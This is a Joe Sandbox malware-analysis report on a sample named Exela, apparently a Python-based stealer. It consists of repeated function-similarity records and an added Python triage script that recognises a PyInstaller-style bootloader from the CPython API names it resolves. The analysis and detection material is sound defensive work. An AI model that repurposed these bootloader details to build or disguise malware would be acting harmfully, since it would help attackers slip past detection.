                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                    • Instruction ID: c1988d28e1002e279d4d484cac0a04103f6ece80cb91bd8ce46e33ab9a492427
                                                                                                    • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                    • Instruction Fuzzy Hash: 8341F532A0821187FA34BB55E55A279F3A0EF55B40F9C4171EA8E87691CF2DE802CB61
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 840049012-0
                                                                                                    • Opcode ID: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                    • Instruction ID: 0161e380bada3dc8dbcb64a249062d881bad0c31413e3b9cded1b703a1518053
                                                                                                    • Opcode Fuzzy Hash: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                    • Instruction Fuzzy Hash: 97219121B087728AFA10BA126516BFAEA51BF45BD4FCC5470EE4D07786CE7EE041C720
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                    • Instruction ID: 7522892212e0090d612d09d23144962a1362839e067a0f634cb4ac9389392f4a
                                                                                                    • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                    • Instruction Fuzzy Hash: D031BE32A1866286F7517B55984B37CAA60AF40BA4FCA51B5EA2D033D2CF7CE8418731
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3947729631-0
                                                                                                    • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                    • Instruction ID: e7df6162451b1382e36028372662225ca7eee501c22f31b918b78909dd21ca01
                                                                                                    • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                    • Instruction Fuzzy Hash: 66218E32A047968AFB24BF64C44A2FC73A0EF44718F88467AD62D06AD5DF38D584C760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                    • Instruction ID: dfc57e5b18331b03d02219bf6d1de5abfb095ae863bf1f6fff83102600040cec
                                                                                                    • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                    • Instruction Fuzzy Hash: B4116326A1C66282FA60BF51A40627EE2A4BF45B80FDC40B1FB4C57B96DF3DD5418730
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                    • Instruction ID: 1436b58a24f9e5537ebd7dd05e69ea6343ea388c359d5b3516914feeb88a895c
                                                                                                    • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                    • Instruction Fuzzy Hash: 1921B372608B9686E761BF18E446379B6A0FF85B54F984334E79D476D5DF3CD8008B10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                    • Instruction ID: 30ad2407d49361679c6fa5feb80e9bad6b5d3437141dd04d202c49cf9c38207d
                                                                                                    • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                    • Instruction Fuzzy Hash: 1101C462A0876241FA05FF529907069E791BF85FE0F8C46B1EE5C17BD6CE3CE5014320
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                    • Instruction ID: 843bb7ab68cefad79fa2dfa46c7e5d33109dcae8ab8d6ec7794bdac5aac5c051
                                                                                                    • Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                    • Instruction Fuzzy Hash: 52019E24E0D2B344FEA0BB21654B179E692AF447D0FDC42B9EA1D827C6DF3CA9418231
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
• Instruction ID: dcb3a3c0898009eba09d65c44cca7bff6b55846c50aade6d3e136ea8aa101ce3
• Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
• Instruction Fuzzy Hash: 38E0C2A4E0872383F7503AB8048B17998504F65340FCCA4F0EA09062C3DE2C68588231
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF75AEAB39A,?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA), ref: 00007FF75AEAEC5D
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
• Instruction ID: 06fd9e8dec647564c60a7775a400b05f1288136303301470a0a986602ca0cb30
• Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
• Instruction Fuzzy Hash: 12F01D54B0937B81FF547A6658AB2B5D2905F84F80FCC65B0C90E863D2DE2CE8818230
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF75AEA0D00,?,?,?,00007FF75AEA236A,?,?,?,?,?,00007FF75AEA3B59), ref: 00007FF75AEAD6AA
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction ID: f1ca97cceb2b0feb5b193fc190cc7dd06fa3024616b0bb6e8c5d08149bd0e355
• Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction Fuzzy Hash: 92F05820F0932785FE647761589B3B892904F94BA0F8C43B0DD2E853C2DE2CE8808230
APIs
• GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95830
• GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95842
• GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95879
• GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE9588B
• GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE958A4
• GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE958B6
• GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE958CF
• GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE958E1
• GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE958FD
• GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE9590F
• GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE9592B
• GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE9593D
• GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95959
• GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE9596B
• GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95987
• GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95999
• GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE959B5
• GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE959C7
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
• Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction ID: 87c2541bdf721b6fcb76899a67c8cdc07f055a2bbc5f468a6bdf870120e1e674
• Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction Fuzzy Hash: 9622D924A0DB2FD5FA54BF55A82A574A3A0AF48745FCC92B5C85E12360FF3CB8498331
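The function recorded above resolves the CPython C-API at run time: each GetProcAddress call is paired with a GetLastError check, and the String ID field carries the full list of names it looks up (PyPreConfig_InitIsolatedConfig, Py_InitializeFromConfig, PyMarshal_ReadObjectFromString, PyRun_SimpleStringFlags and the rest) together with the failure message "Failed to get address for %hs". That combination is what a bootloader needs to start an embedded interpreter from a bundled python DLL and run marshalled bytecode, and it is consistent with the PyInstaller-style packaging used by Python stealers such as Exela. The snippet below is an added triage example, not Joe Sandbox output and not code from the sample: it parses that String ID field, then scans a byte buffer (a file, a section, or a memory dump such as the .sdmp above) for the names as NUL-terminated strings, so that PyUnicode_Decode is not mis-counted when only PyUnicode_DecodeFSDefault is present. The hit threshold, the verdict label and both input buffers are assumptions constructed for the example.

```python
"""Added triage example (not Joe Sandbox output and not code from the sample):
recognise a Python-embedding bootloader from the symbol names it resolves
with GetProcAddress, using the String ID field of the record above."""
import re

# The String ID field of the record above, copied verbatim. Joe Sandbox joins
# the individual strings referenced by a function with '$'.
RECORD_STRING_ID = (
    "Failed to get address for %hs$GetProcAddress$PyConfig_Clear$"
    "PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$"
    "PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$"
    "PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$"
    "PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$"
    "PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$"
    "PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$"
    "PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$"
    "PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$"
    "PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$"
    "PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$"
    "PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$"
    "Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$"
    "Py_IsInitialized$Py_PreInitialize"
)

ERROR_FMT = "Failed to get address for %hs"   # message emitted when a lookup fails
MIN_API_HITS = 10                             # assumed threshold, not from the report

_PY_API = re.compile(r"^Py[A-Z_]")            # CPython exports: Py..., Py_...


def parse_string_id(field: str) -> list[str]:
    """Split a Joe Sandbox String ID field into its individual strings."""
    return [s for s in field.split("$") if s]


def python_api_names(strings: list[str]) -> set[str]:
    """Keep only CPython C-API symbol names; drops GetProcAddress and the message."""
    return {s for s in strings if _PY_API.match(s)}


def find_symbol_strings(data: bytes, names: set[str]) -> set[str]:
    """Return the names present in data as NUL-terminated ASCII strings.

    Requiring the trailing NUL matters: a plain substring search would report
    PyUnicode_Decode whenever PyUnicode_DecodeFSDefault is present and inflate
    the hit count."""
    return {n for n in names if n.encode("ascii") + b"\x00" in data}


def classify(data: bytes, field: str = RECORD_STRING_ID) -> dict:
    """Score a buffer (file, section or memory dump) against the symbol set."""
    names = python_api_names(parse_string_id(field))
    hits = find_symbol_strings(data, names)
    has_error_fmt = ERROR_FMT.encode("ascii") + b"\x00" in data
    verdict = (
        "python-embedding bootloader (PyInstaller-style)"
        if has_error_fmt and len(hits) >= MIN_API_HITS
        else "no match"
    )
    return {"api_hits": sorted(hits), "error_fmt": has_error_fmt, "verdict": verdict}


def build_sample_rdata(strings: list[str]) -> bytes:
    """Construct a fake read-only-data blob: NUL-terminated ASCII strings laid
    out the way a compiler emits a string table. Constructed test input only."""
    return b"\x00".join(s.encode("ascii") for s in strings) + b"\x00"


# Constructed inputs: one mimicking the sample's string table, one that only
# carries the longer PyUnicode_DecodeFSDefault name (the false-positive case).
POSITIVE_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 32
    + build_sample_rdata(parse_string_id(RECORD_STRING_ID))
)
NEGATIVE_SAMPLE = build_sample_rdata(["PyUnicode_DecodeFSDefault", "Hello, world"])

if __name__ == "__main__":
    for label, blob in (("positive", POSITIVE_SAMPLE), ("negative", NEGATIVE_SAMPLE)):
        r = classify(blob)
        print(f"{label}: {r['verdict']} ({len(r['api_hits'])} API names, "
              f"error format {'present' if r['error_fmt'] else 'absent'})")
```

To run it against the report's own artefact, read the .sdmp or the dropped executable with `open(path, "rb").read()` and pass the bytes to `classify`; the String ID from any other Joe Sandbox record can be substituted through the `field` argument.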
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
• Instruction ID: 1c8c1c64a26077d0fd65f62671c78b7cd117953da8f97191762a1f94a6d207b0
• Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
• Instruction Fuzzy Hash: 99316272608B958AFB60AF64E8857EE7364FB84744F484139DA4D47B94EF38C548C720
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
• Instruction ID: 2b1ec83d79ad14212572189d2288351226caed0735b322704394a2dd7ad047b1
• Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
• Instruction Fuzzy Hash: 5D319432608B918AEB20FF25E8466AEB3A4FF84754F980235EA8D47B54DF3CC545CB10
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
• Instruction ID: da4a6b9407eb0871ddc48659c12e4f25b72625f04edaca1ba97e14f9c10eba7e
• Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
• Instruction Fuzzy Hash: E3B1CB22B187AA81FA61BB21A94A1B9E3D0EF44BF4F885271DD5D07BC5DE3CE841C710
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
